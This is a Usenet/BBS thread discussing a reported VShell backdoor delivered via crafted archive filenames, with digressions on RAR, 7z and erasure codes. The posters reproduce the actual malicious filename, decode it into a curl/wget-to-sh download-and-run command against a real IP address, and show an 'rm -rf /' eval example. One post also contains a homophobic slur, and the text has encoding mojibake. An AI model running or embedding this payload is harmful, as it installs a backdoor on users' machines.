Sysop: | Amessyroom |
---|---|
Location: | Fayetteville, NC |
Users: | 23 |
Nodes: | 6 (0 / 6) |
Uptime: | 54:48:14 |
Calls: | 583 |
Files: | 1,139 |
D/L today: |
179 files (27,921K bytes) |
Messages: | 111,802 |
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called
VShell.
The "Linux-specific malware infection chain that starts with a spam
email with a malicious RAR archive file," Trellix researcher Sagar Bade
said in a technical write-up.
I think I have seen many bug reports about WinRAR ....
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isnrCOt one of them, but I still donrCOt understand how the vulnerability
is supposed to work. The proofs of concept on the Trellix page all seem to rely on wantonly dangerous use of the rCLevalrCY command, which would be a dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.
Damn, things are getting bad.
Lawrence DAOliveiro wrote on 8/27/2025 6:22 PM:
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isnt one of them, but I still dont understand how the vulnerability
is supposed to work. The proofs of concept on the Trellix page all seem to >> rely on wantonly dangerous use of the evalY command, which would be a
dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.a Damn, things are getting bad.
Lawrence DAOliveiro wrote on 8/27/2025 6:22 PM:
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isnrCOt one of them, but I still donrCOt understand how the
vulnerability is supposed to work. The proofs of concept on the
Trellix page all seem to rely on wantonly dangerous use of the
rCLevalrCY command, which would be a dumb thing to do indeed.
I thought Linux didn't have any bugs or malware. Damn, things are
getting bad.
On 28/08/2025 10:21 am, Hank Rogers wrote:
Lawrence DAOliveiro wrote on 8/27/2025 6:22 PM:Does ANYTHING ever get to "didn't have any bugs or malware" state??
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isnrCOt one of them, but I still donrCOt understand how the vulnerability is supposed to work. The proofs of concept on the
Trellix page all seem to rely on wantonly dangerous use of the
rCLevalrCY command, which would be a dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.a Damn, things are getting bad.
"didn't have any *UNDISCOVERED* bugs or malware" today, sure, but who know what will be the state tomorrow!!
Lawrence DrCOOliveiro wrote on 8/27/2025 6:22 PM:
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isn|ore4raot one of them, but I still don|ore4raot understand how the >> vulnerability
is supposed to work. The proofs of concept on the Trellix page all
seem to
rely on wantonly dangerous use of the |ore4+oeval|ore4-Y command, which would
be a
dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.-a Damn, things are
getting bad.
On Wed, 27 Aug 2025 19:21:59 -0500, Hank Rogers wrote:
I thought Linux didn't have any bugs or malware.
This certainly isnrCOt one of them.
Damn, things are getting bad.
There used to be a lot more malware for Linux, back in the days when it
was less popular. As its popularity has gone up, it actually seems to be getting more secure.
<https://en.wikipedia.org/wiki/Linux_malware#Threats>
On Thu, 8/28/2025 6:19 AM, Daniel70 wrote:
On 28/08/2025 10:21 am, Hank Rogers wrote:
Lawrence DrCOOliveiro wrote on 8/27/2025 6:22 PM:Does ANYTHING ever get to "didn't have any bugs or malware" state??
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isn|ore4raot one of them, but I still don|ore4raot understand how the vulnerability is supposed to work. The proofs of concept on the
Trellix page all seem to rely on wantonly dangerous use of the
|ore4+oeval|ore4-Y command, which would be a dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.-a Damn, things are getting bad.
"didn't have any *UNDISCOVERED* bugs or malware" today, sure, but who know what will be the state tomorrow!!
A lot of mistakes, are implementation mistakes like not
using a hardened routine for this or that. And, we can estimate
how many unclassified mistakes there are in a work. Like some
version of Windows, the estimate was 50,000 just based on the KLOC count. Microsoft would have automatic scans for the easy stuff -- even the
compiler can slap your fingers for some of those.
This is a different class of bug, in that it is an architecture bug.
It could be, that the private RAR module could be doing this, rather than
the Archive Manager applying this recipe to everything it does. There
is no mention of ZIP files having specially crafted filenames, for example.
The RAR decoder module is free. The only question I would have about
it, is whether it is Open Source and all the code for RAR in the
Archive Manager, can be read by anyone ("many eyes"). If Mr.Roshal
coded this up, and the activity is hidden in a binary blob, that would
make it easier to understand. It just doesn't seem like an activity you
would do at that level, and logically the place to be attempting
stuff like this, is the Archive Manager.
And once the Linux people find where in the code this is happening,
this will lead to an examination of the ecosystem, to make sure there
are no more of these (obviously bad) things out there. I doubt anyone
signed off on this as being "particularly clever". This might well be
code that was never reviewed.
The RAR encoder module costs money. That's how its author keeps himself fed. That only gets on a computer if you bought a copy.
7ZIP comes with an SDK, and the Archive Manager version could be based
on the SDK materials. (Even Windows uses libarchive, a recent addition.) Whereas the Windows 7Z executable version (from its web site) is closed source as far as I know, but still free. The Windows version was recently modified to include a higher threads-of-execution count, so that it could
be used on machines with "processor groups" (you can finally compress with your 96 core computer and use all 96 cores). The article describing this,
was VERY strangely worded, and the reporter was obviously in a shit-disturbing
mood.
One of the acid tests for compressors, is getting two different versions
of code, to produce roughly the same file size. You can't expect an exact match, due to time stamps, but if the byte counts are the same, that is
a positive sign. When I tried to get Linux and Windows to make the same
7Z, it didn't work out that well. Generally I do not hear comments about "this version could not decode the output of that version", that
seems handled pretty well. The two ecosystems could still read each others output.
It may have started with an email, but only part of the attachment handling would be done there, and handoff of any further layers of decoding needed, could end up with the Archive Manager. As a software dev, when you
"use someone elses services", you don't know how stupid they are. And
it may not be apparently, that something as silly as the problem description, is happening when you call that service. But some Black Hat figured it out.
On 2025-08-28 13:54, Paul wrote:
On Thu, 8/28/2025 6:19 AM, Daniel70 wrote:
On 28/08/2025 10:21 am, Hank Rogers wrote:
Lawrence DrCOOliveiro wrote on 8/27/2025 6:22 PM:Does ANYTHING ever get to "didn't have any bugs or malware" state??
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:I thought Linux didn't have any bugs or malware.-a Damn, things are
I think I have seen many bug reports about WinRAR ....
This isn|ore4raot one of them, but I still don|ore4raot understand how the
vulnerability is supposed to work. The proofs of concept on the
Trellix page all seem to rely on wantonly dangerous use of the
|ore4+oeval|ore4-Y command, which would be a dumb thing to do indeed. >>>>
getting bad.
"didn't have any *UNDISCOVERED* bugs or malware" today, sure, but who
know what will be the state tomorrow!!
A lot of mistakes, are implementation mistakes like not
using a hardened routine for this or that. And, we can estimate
how many unclassified mistakes there are in a work. Like some
version of Windows, the estimate was 50,000 just based on the KLOC count.
Microsoft would have automatic scans for the easy stuff -- even the
compiler can slap your fingers for some of those.
This is a different class of bug, in that it is an architecture bug.
It could be, that the private RAR module could be doing this, rather than
the Archive Manager applying this recipe to everything it does. There
is no mention of ZIP files having specially crafted filenames, for
example.
The RAR decoder module is free. The only question I would have about
it, is whether it is Open Source and all the code for RAR in the
Archive Manager, can be read by anyone ("many eyes"). If Mr.Roshal
coded this up, and the activity is hidden in a binary blob, that would
make it easier to understand. It just doesn't seem like an activity you
would do at that level, and logically the place to be attempting
stuff like this, is the Archive Manager.
There are two decoders.
One is "unrar". The source is available, but AFAIK it doesn't classify
as "open source". SUSE classifies it as "NonFree".
cer@Telcontar:~> rpm -qi unrar
Name-a-a-a-a-a-a-a : unrar
Version-a-a-a-a : 7.1.1
Release-a-a-a-a : lp156.2.3.1
Architecture: x86_64
Install Date: 2025-02-13T21:45:22 CET
Group-a-a-a-a-a-a : Unspecified
Size-a-a-a-a-a-a-a : 404795
License-a-a-a-a : NonFree
Signature-a-a : RSA/SHA512, 2024-12-08T11:55:04 CET, Key ID 35a2f86e29b700a4 Source RPM-a : unrar-7.1.1-lp156.2.3.1.src.rpm
Build Date-a : 2024-12-08T11:54:57 CET
Build Host-a : h02-ch1a
Relocations : (not relocatable)
Packager-a-a-a : http://bugs.opensuse.org
Vendor-a-a-a-a-a : openSUSE
URL-a-a-a-a-a-a-a-a : https://www.rarlab.com
Summary-a-a-a-a : A program to extract, test, and view RAR archives Description :
The unRAR utility is a freeware program distributed with source code
and developed for extracting, testing, and viewing the contents of
archives created with the RAR archiver.
Distribution: SUSE Linux Enterprise 15
cer@Telcontar:~>
file "/usr/share/doc/packages/unrar/readme.txt" says:
-a-a 4. Legal stuff
-a-a Unrar source may be used in any software to handle RAR archives
-a-a without limitations free of charge, but cannot be used to re-create
-a-a the RAR compression algorithm, which is proprietary. Distribution
-a-a of modified Unrar source in separate form or as a part of other
-a-a software is permitted, provided that it is clearly stated in
-a-a the documentation and source comments that the code may not be used
-a-a to develop a RAR (WinRAR) compatible archiver.
-a-a More detailed license text is available in license.txt.
However, the file "license.txt" is not available, dunno why.
The other decoder is in the shareware "rar" package:
cer@Telcontar:~> rpm -qi rar
Name-a-a-a-a-a-a-a : rar
Version-a-a-a-a : 6.2.2
Release-a-a-a-a : 150600.1.pm.2
Architecture: x86_64
Install Date: 2025-02-13T21:54:54 CET
Group-a-a-a-a-a-a : Productivity/Archiving/Compression
Size-a-a-a-a-a-a-a : 1001629
License-a-a-a-a : NonFree
Signature-a-a : RSA/SHA1, 2024-10-17T10:26:00 CEST, Key ID 45a1d0671abd1afb Source RPM-a : rar-6.2.2-150600.1.pm.2.src.rpm
Build Date-a : 2024-10-17T03:58:06 CEST
Build Host-a : buildwk3
Relocations : (not relocatable)
Packager-a-a-a : packman@links2linux.de
Vendor-a-a-a-a-a : http://packman.links2linux.de
URL-a-a-a-a-a-a-a-a : https://www.rarsoft.com
Summary-a-a-a-a : Compression and decompression program rar
Description :
Compression and decompression program.
Distribution: Extra / openSUSE_Leap_15.6
cer@Telcontar:~>
It is not clear what package presents the problem, but I guess it is
both. readme file in unrar says:
-a-a 1. General
-a-a Unrar source is subset of RAR and generated from RAR source automatically,
-a-a by a small program removing blocks like '#ifndef UNRAR ... #endif'.
-a-a Such method is not perfect and you may find some RAR related stuff
-a-a unnecessary in Unrar, especially in header files.
RAR is usually the compression tool pirates use for their software. For
And once the Linux people find where in the code this is happening,
this will lead to an examination of the ecosystem, to make sure there
are no more of these (obviously bad) things out there. I doubt anyone
signed off on this as being "particularly clever". This might well be
code that was never reviewed.
The RAR encoder module costs money. That's how its author keeps
himself fed.
That only gets on a computer if you bought a copy.
7ZIP comes with an SDK, and the Archive Manager version could be based
on the SDK materials. (Even Windows uses libarchive, a recent addition.)
Whereas the Windows 7Z executable version (from its web site) is closed
source as far as I know, but still free. The Windows version was recently
modified to include a higher threads-of-execution count, so that it could
be used on machines with "processor groups" (you can finally compress
with
your 96 core computer and use all 96 cores). The article describing this,
was VERY strangely worded, and the reporter was obviously in a shit-
disturbing
mood.
One of the acid tests for compressors, is getting two different versions
of code, to produce roughly the same file size. You can't expect an exact
match, due to time stamps, but if the byte counts are the same, that is
a positive sign. When I tried to get Linux and Windows to make the same
7Z, it didn't work out that well. Generally I do not hear comments about
"this version could not decode the output of that version", that
seems handled pretty well. The two ecosystems could still read each
others output.
It may have started with an email, but only part of the attachment
handling
would be done there, and handoff of any further layers of decoding
needed,
could end up with the Archive Manager. As a software dev, when you
"use someone elses services", you don't know how stupid they are. And
it may not be apparently, that something as silly as the problem
description,
is happening when you call that service. But some Black Hat figured it
out.
The rar compressor is not very useful in Linux. It has features I like,
as error correction, but it can not save all the file attributes. I
don't think it is popular.
However, it is possible to get emails with rar attachments. I have got a few. And there are tools that automatically examine the contents of emails.
On Wed, 27 Aug 2025 19:21:59 -0500, Hank Rogers wrote:
I thought Linux didn't have any bugs or malware.
This certainly isnrCOt one of them.
Damn, things are getting bad.
There used to be a lot more malware for Linux, back in the days when it
was less popular. As its popularity has gone up, it actually seems to be getting more secure.
<https://en.wikipedia.org/wiki/Linux_malware#Threats>
On 2025-08-28 8:57 a.m., Carlos E.R. wrote:
On 2025-08-28 13:54, Paul wrote:
On Thu, 8/28/2025 6:19 AM, Daniel70 wrote:
On 28/08/2025 10:21 am, Hank Rogers wrote:
Lawrence DrCOOliveiro wrote on 8/27/2025 6:22 PM:
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
The rar compressor is not very useful in Linux. It has features IRAR is usually the compression tool pirates use for their software. For
like, as error correction, but it can not save all the file
attributes. I don't think it is popular.
However, it is possible to get emails with rar attachments. I have got
a few. And there are tools that automatically examine the contents of
emails.
my tastes, 7z is just fine, especially with its encryption capabilities.
As far as I know, there are a few open-source programs capable of
opening 7z and compressing to that format.
Every operating system has vulnerabilities. The obstacle to fixing them
on Linux used to be devout Linux zealots who would deny their severity
or the existence of the problem.
Now, it's a band of homosexual
crusaders who put sexual identity before competence and are mostly
incapable of fixing them even if asked to do so. As sad as it is, Linux
is only going to get worse because of this, just look at how many
orphaned modules the Linux kernels now contains.
Every operating system has vulnerabilities. The obstacle to fixing
them on Linux used to be devout Linux zealots who would deny their
severity or the existence of the problem.
This is a different class of bug, in that it is an architecture bug.
There are two decoders.
One is "unrar". The source is available, but AFAIK it doesn't classify
as "open source". SUSE classifies it as "NonFree".
RAR is usually the compression tool pirates use for their software. For
my tastes, 7z is just fine ...
Malware is not as much of a problem as the vulnerabilities are.
On Thu, 28 Aug 2025 07:54:45 -0400, Paul wrote:
This is a different class of bug, in that it is an architecture bug.
There is no rCLbugrCY or rCLsecurity vulnerabilityrCY here. Look at the Trellix
report again: the only way the rCLsecurity expertrCY could compromise their system was by doing stupid things with the rCLevalrCY command.
On 2025-08-27 8:21 p.m., Hank Rogers wrote:
Lawrence DrCOOliveiro wrote on 8/27/2025 6:22 PM:
On Wed, 27 Aug 2025 23:25:34 +0800, Mr. Man-wai Chang wrote:
I think I have seen many bug reports about WinRAR ....
This isn|ore4raot one of them, but I still don|ore4raot understand how the vulnerability
is supposed to work. The proofs of concept on the Trellix page all seem to >>> rely on wantonly dangerous use of the |ore4+oeval|ore4-Y command, which would be a
dumb thing to do indeed.
I thought Linux didn't have any bugs or malware.-a Damn, things are getting bad.
Every operating system has vulnerabilities. The obstacle to fixing them on Linux used to be devout Linux zealots who would deny their severity or the existence of the problem. Now, it's a band of homosexual crusaders who put sexual identity before competence and are mostly incapable of fixing them even if asked to do so. As sad as it is, Linux is only going to get worse because of this, just look at how many orphaned modules the Linux kernels now contains.
On Thu, 8/28/2025 6:32 PM, Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 07:54:45 -0400, Paul wrote:
This is a different class of bug, in that it is an architecture bug.
There is no rCLbugrCY or rCLsecurity vulnerabilityrCY here. Look at the Trellix
report again: the only way the rCLsecurity expertrCY could compromise their >> system was by doing stupid things with the rCLevalrCY command.
But you still have to figure out, where that is happening during the event.
The ze[a]lots don't write the code.
There might be more to this story than has been reported.
Maybe there is an actual exploit, allowing the shell to become
involved where that was not expected.
On Thu, 28 Aug 2025 19:18:13 -0400, Paul wrote:
On Thu, 8/28/2025 6:32 PM, Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 07:54:45 -0400, Paul wrote:
This is a different class of bug, in that it is an architecture bug.
There is no rCLbugrCY or rCLsecurity vulnerabilityrCY here. Look at the Trellix
report again: the only way the rCLsecurity expertrCY could compromise their
system was by doing stupid things with the rCLevalrCY command.
But you still have to figure out, where that is happening during the event.
You mean, if a filename gets created like
FILENAME='rm -rf /'
and someone does
eval $FILENAME
there is something you rCLstill have to figure outrCY?
For example, without looking at the manual page.
unrar -t compressed.rar # Typically lists the contents of an archive
$ The exploit string would not be expanded at this point,
# as it is arriving on a "stdin" on the main program.
unrar -x compressed.rar filename-obtained-from-previous-step # Then a shell expansion happens on the filename part
# Because the filename string was formulated for exploitation
# when used as a shell argument.
On Thu, 28 Aug 2025 22:44:41 -0400, Paul wrote:
For example, without looking at the manual page.
unrar -t compressed.rar # Typically lists the contents of an archive
$ The exploit string would not be expanded at this point,
# as it is arriving on a "stdin" on the main program.
unrar -x compressed.rar filename-obtained-from-previous-step # Then a shell expansion happens on the filename part
# Because the filename string was formulated for exploitation
# when used as a shell argument.
OK, I tried it. I donrCOt do RAR, but that shouldnrCOt matter:
ldo@theon:vshell_try> ls -l
total 4
-rw-r--r-- 1 ldo users 476 Aug 29 15:59 funny.zip
ldo@theon:vshell_try> lsar -l funny.zip
funny.zip: Zip
Flags File size Ratio Mode Date Time Name
===== ========== ===== ==== ========== ===== ====
0. ----- 0 ----- None 2025-08-29 15:59 ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash
(Flags: D=Directory, R=Resource fork, L=Link, E=Encrypted, @=Extended attributes)
ldo@theon:vshell_try> ls -l
total 4
-rw-r--r-- 1 ldo users 476 Aug 29 15:59 funny.zip
-rw-r--r-- 1 ldo users 0 Aug 29 15:59 ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash
So what was supposed to happen, again?
On Fri, 8/29/2025 12:02 AM, Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 22:44:41 -0400, Paul wrote:
For example, without looking at the manual page.
unrar -t compressed.rar # Typically lists the contents of an archive
$ The exploit string would not be expanded at this point,
# as it is arriving on a "stdin" on the main program.
unrar -x compressed.rar filename-obtained-from-previous-step # Then a shell expansion happens on the filename part
# Because the filename string was formulated for exploitation
# when used as a shell argument.
OK, I tried it. I donrCOt do RAR, but that shouldnrCOt matter:
ldo@theon:vshell_try> ls -l
total 4
-rw-r--r-- 1 ldo users 476 Aug 29 15:59 funny.zip
ldo@theon:vshell_try> lsar -l funny.zip
funny.zip: Zip
Flags File size Ratio Mode Date Time Name
===== ========== ===== ==== ========== ===== ====
0. ----- 0 ----- None 2025-08-29 15:59 ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash
(Flags: D=Directory, R=Resource fork, L=Link, E=Encrypted, @=Extended attributes)
ldo@theon:vshell_try> ls -l
total 4
-rw-r--r-- 1 ldo users 476 Aug 29 15:59 funny.zip
-rw-r--r-- 1 ldo users 0 Aug 29 15:59 ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash
So what was supposed to happen, again?
The base64 conversion looks like this.
(curl -fsSL -m180 http://47.98.194.60:8084/slw||wget -T180 -q http://47.98.194.60:8084/slw)|sh
It looks like a download, is being fed right into a shell, but that
only happens after the base64 step, that base64 step wrapped in
syntax I don't recognize.
On Thu, 28 Aug 2025 09:02:34 -0400, CrudeSausage wrote:
RAR is usually the compression tool pirates use for their software. For
my tastes, 7z is just fine ...
A few times now, after extracting a .rar archive, I have tried
recompressing the result as .7z.
In every case, the .7z file ended up smaller than the .rar version.
On Thu, 28 Aug 2025 08:45:16 -0400, CrudeSausage wrote:
Malware is not as much of a problem as the vulnerabilities are.
There was no rCLvulnerabilityrCY here. Read the Trellix report for yourself, and judge.
CrudeSausage wrote:
Every operating system has vulnerabilities. The obstacle to fixing them
on Linux used to be devout Linux zealots who would deny their severity
or the existence of the problem.
I don't recall any such thing happening.
Now, it's a band of homosexual
crusaders who put sexual identity before competence and are mostly
incapable of fixing them even if asked to do so. As sad as it is, Linux
is only going to get worse because of this, just look at how many
orphaned modules the Linux kernels now contains.
How many are there? Do they hurt anything?
Much of Linux development is driven from business interests, and
that's not going away.
On Thu, 28 Aug 2025 08:44:30 -0400, CrudeSausage wrote:
Every operating system has vulnerabilities. The obstacle to fixing
them on Linux used to be devout Linux zealots who would deny their
severity or the existence of the problem.
And of course no non-zealot has the software chops to come up with
their own fixes, have they? ItrCOs not like the software is free for you
to use and study and modify and redistribute and ...
... oh, wait.
On 2025-08-28 6:35 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 09:02:34 -0400, CrudeSausage wrote:
RAR is usually the compression tool pirates use for their software. For
my tastes, 7z is just fine ...
A few times now, after extracting a .rar archive, I have tried
recompressing the result as .7z.
In every case, the .7z file ended up smaller than the .rar version.
I might be wrong since I never really compress anything, but I believe that RAR is prioritized over 7z or ZIP not because it has a better compression rate, but because it makes it easy to create a number of similarly-sized files connected to the same piece of software. I'm sure that anyone who pirated software here, whether through Usenet, a BBS or the Internet, recalls the software coming in 16 equally-sized RAR, R01, R02 and so on files. Perhaps that was the advantage of the format.
On Fri, 8/29/2025 8:38 AM, CrudeSausage wrote:
On 2025-08-28 6:35 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 09:02:34 -0400, CrudeSausage wrote:
RAR is usually the compression tool pirates use for their software. For >>>> my tastes, 7z is just fine ...
A few times now, after extracting a .rar archive, I have tried
recompressing the result as .7z.
In every case, the .7z file ended up smaller than the .rar version.
I might be wrong since I never really compress anything, but I believe that RAR is prioritized over 7z or ZIP not because it has a better compression rate, but because it makes it easy to create a number of similarly-sized files connected to the same piece of software. I'm sure that anyone who pirated software here, whether through Usenet, a BBS or the Internet, recalls the software coming in 16 equally-sized RAR, R01, R02 and so on files. Perhaps that was the advantage of the format.
7Z can also make a series of size-limited files
when it outputs a compressed item.
"split to volumes, bytes"
That allows you to give a byte specification
for what size output file you want. Like a few bytes
short of 4GB, would allow storing a 16GB 7Z archive
as four 4GB files on a FAT32 partition.
sample.7z.1
sample.7z.3177 <=== it numbers the volumes as it makes the archive series
7Z compresses a bit better than RAR. Both support
encryption as an option. Obviously, when something
compresses better, there is a time versus quality tradeoff.
One of the ways 7Zip does this, is by using a relatively
large dictionary per thread. (If you compress on 32 cores
and 600MB dictionary, that takes 19GB of RAM, so you'd want
the next size up of computer, or 32GB of dual channel RAM).
When you build a computer with that many cores, compression
is assumed to be one of the applications (gaming can be
done with eight cores if you like).
https://storedbits.com/7-zip-vs-winrar-vs-winzip/
I was able to find one comparison web site, where the results
were silly and wrong. You have to be careful with this stuff.
Video files, the good formats are already compressed, and
applying a compressor does not help much. However, the AES-256
encryption the tool can apply, there are reasons a person may
be doing that to the payload :-) Remember to pick a strong
password.
Once you encrypt a file, it can't be compressed any more,
so encryption is the "last step".
I use 7ZIP compression for virtual machine containers
and for Macrium backups (older ones, making space for
more backups on a backup HDD). Since 7ZIP runs on all cores,
it can use a fair bit of electricity. To compress a hard
drive, costs a bucks worth of electricity :-) A measurable
expense.
Paul
On 2025-08-28 6:36 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 08:45:16 -0400, CrudeSausage wrote:
Malware is not as much of a problem as the vulnerabilities are.
There was no rCLvulnerabilityrCY here. Read the Trellix report for
yourself, and judge.
Yes, why would I call it a vulnerability just because it was
reported as a vulnerability? Silly me!
On Fri, 29 Aug 2025 08:39:24 -0400, CrudeSausage wrote:
On 2025-08-28 6:36 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 08:45:16 -0400, CrudeSausage wrote:
Malware is not as much of a problem as the vulnerabilities are.
There was no rCLvulnerabilityrCY here. Read the Trellix report for
yourself, and judge.
Yes, why would I call it a vulnerability just because it was
reported as a vulnerability? Silly me!
Silly you, indeed!
It was never rCLreported as a vulnerabilityrCY. If it had, it would have
been assigned a CVE number. There is no CVE number (at least that is mentioned in the Trellix report) associated with this so-called rCLvulnerabilityrCY. DoesnrCOt that make you think twice before jumping to conclusions?
Yes. Every time a flaw has ever been reported with linux, It has
ALWAYS turned out to be a false alarm.
On 2025-08-28 6:29 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 08:44:30 -0400, CrudeSausage wrote:
Every operating system has vulnerabilities. The obstacle to fixing
them on Linux used to be devout Linux zealots who would deny their
severity or the existence of the problem.
And of course no non-zealot has the software chops to come up with
their own fixes, have they? ItrCOs not like the software is free for you
to use and study and modify and redistribute and ...
... oh, wait.
You can't on one hand expect for the average user to adopt Linux and
then call on them to learn to code to fix their issues.
On 2025-08-28 6:29 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 08:44:30 -0400, CrudeSausage wrote:
Every operating system has vulnerabilities. The obstacle to fixing
them on Linux used to be devout Linux zealots who would deny their
severity or the existence of the problem.
And of course no non-zealot has the software chops to come up with
their own fixes, have they? ItrCOs not like the software is free for you
to use and study and modify and redistribute and ...
... oh, wait.
You can't on one hand expect for the average user to adopt Linux and
then call on them to learn to code to fix their issues. Those are two different types of users and the former will just uninstall the software
and go back to what's familiar in either Windows or Mac OS, walled garden or not.
On 2025-08-28 6:35 p.m., Lawrence DrCOOliveiro wrote:
On Thu, 28 Aug 2025 09:02:34 -0400, CrudeSausage wrote:
RAR is usually the compression tool pirates use for their software. For
my tastes, 7z is just fine ...
A few times now, after extracting a .rar archive, I have tried
recompressing the result as .7z.
In every case, the .7z file ended up smaller than the .rar version.
I might be wrong since I never really compress anything, but I believe
that RAR is prioritized over 7z or ZIP not because it has a better compression rate, but because it makes it easy to create a number of similarly-sized files connected to the same piece of software. I'm sure
that anyone who pirated software here, whether through Usenet, a BBS or
the Internet, recalls the software coming in 16 equally-sized RAR, R01,
R02 and so on files. Perhaps that was the advantage of the format.
One of the reasons, there is never only one, is that rar has error
recovery. Meaning that you could create a rar archive divided into
several floppies (or CDs), and if some sectors were damaged, or lost in transmission, the whole thing could still be correctly decompressed.
On Sun, 31 Aug 2025 02:35:46 +0200, Carlos E.R. wrote:
One of the reasons, there is never only one, is that rar has error
recovery. Meaning that you could create a rar archive divided into
several floppies (or CDs), and if some sectors were damaged, or lost in
transmission, the whole thing could still be correctly decompressed.
That division of data into blocks with redundancy to cope with some >proportion of missing/damaged blocks is called an oerasure codeo. E.g. >fountain codes <https://errorcorrectionzoo.org/c/fountain> provide this
sort of function.
ThatAs orthogonal to packing up files into an archive and applying >compression, though. It can be useful to have one without the other.
I was looking through the standard Debian repo for some utility that >provides such redundant segmentation, and I couldnAt find one.
On Sun, 31 Aug 2025 01:21:53 -0000 (UTC), Lawrence D-|Oliveiro <ldo@nz.invalid> wrote:
I was looking through the standard Debian repo for some utility that
provides such redundant segmentation, and I couldnrCOt find one.
Have you looked at MultiPar or Easy Par2?
On Sun, 31 Aug 2025 02:35:46 +0200, Carlos E.R. wrote:
One of the reasons, there is never only one, is that rar has error
recovery. Meaning that you could create a rar archive divided into
several floppies (or CDs), and if some sectors were damaged, or lost in
transmission, the whole thing could still be correctly decompressed.
That division of data into blocks with redundancy to cope with some proportion of missing/damaged blocks is called an rCLerasure coderCY. E.g. fountain codes <https://errorcorrectionzoo.org/c/fountain> provide this
sort of function.
ThatrCOs orthogonal to packing up files into an archive and applying compression, though. It can be useful to have one without the other.
I was looking through the standard Debian repo for some utility that
provides such redundant segmentation, and I couldnrCOt find one.
On 2025-08-31 03:21, Lawrence DrCOOliveiro wrote:
On Sun, 31 Aug 2025 02:35:46 +0200, Carlos E.R. wrote:
One of the reasons, there is never only one, is that rar has error
recovery. Meaning that you could create a rar archive divided into
several floppies (or CDs), and if some sectors were damaged, or lost in
transmission, the whole thing could still be correctly decompressed.
That division of data into blocks with redundancy to cope with some
proportion of missing/damaged blocks is called an rCLerasure coderCY. E.g. >> fountain codes <https://errorcorrectionzoo.org/c/fountain> provide this
sort of function.
Or "forward error correction". The NASA knows a lot about this, it is used in transmissions from the remote craft.
And oh, yes, I verified long ago that the feature did work as intended with floppies (rar).
ThatrCOs orthogonal to packing up files into an archive and applying
compression, though. It can be useful to have one without the other.
Certainly.
I was looking through the standard Debian repo for some utility that
provides such redundant segmentation, and I couldnrCOt find one.
par and par2, maybe. parchive.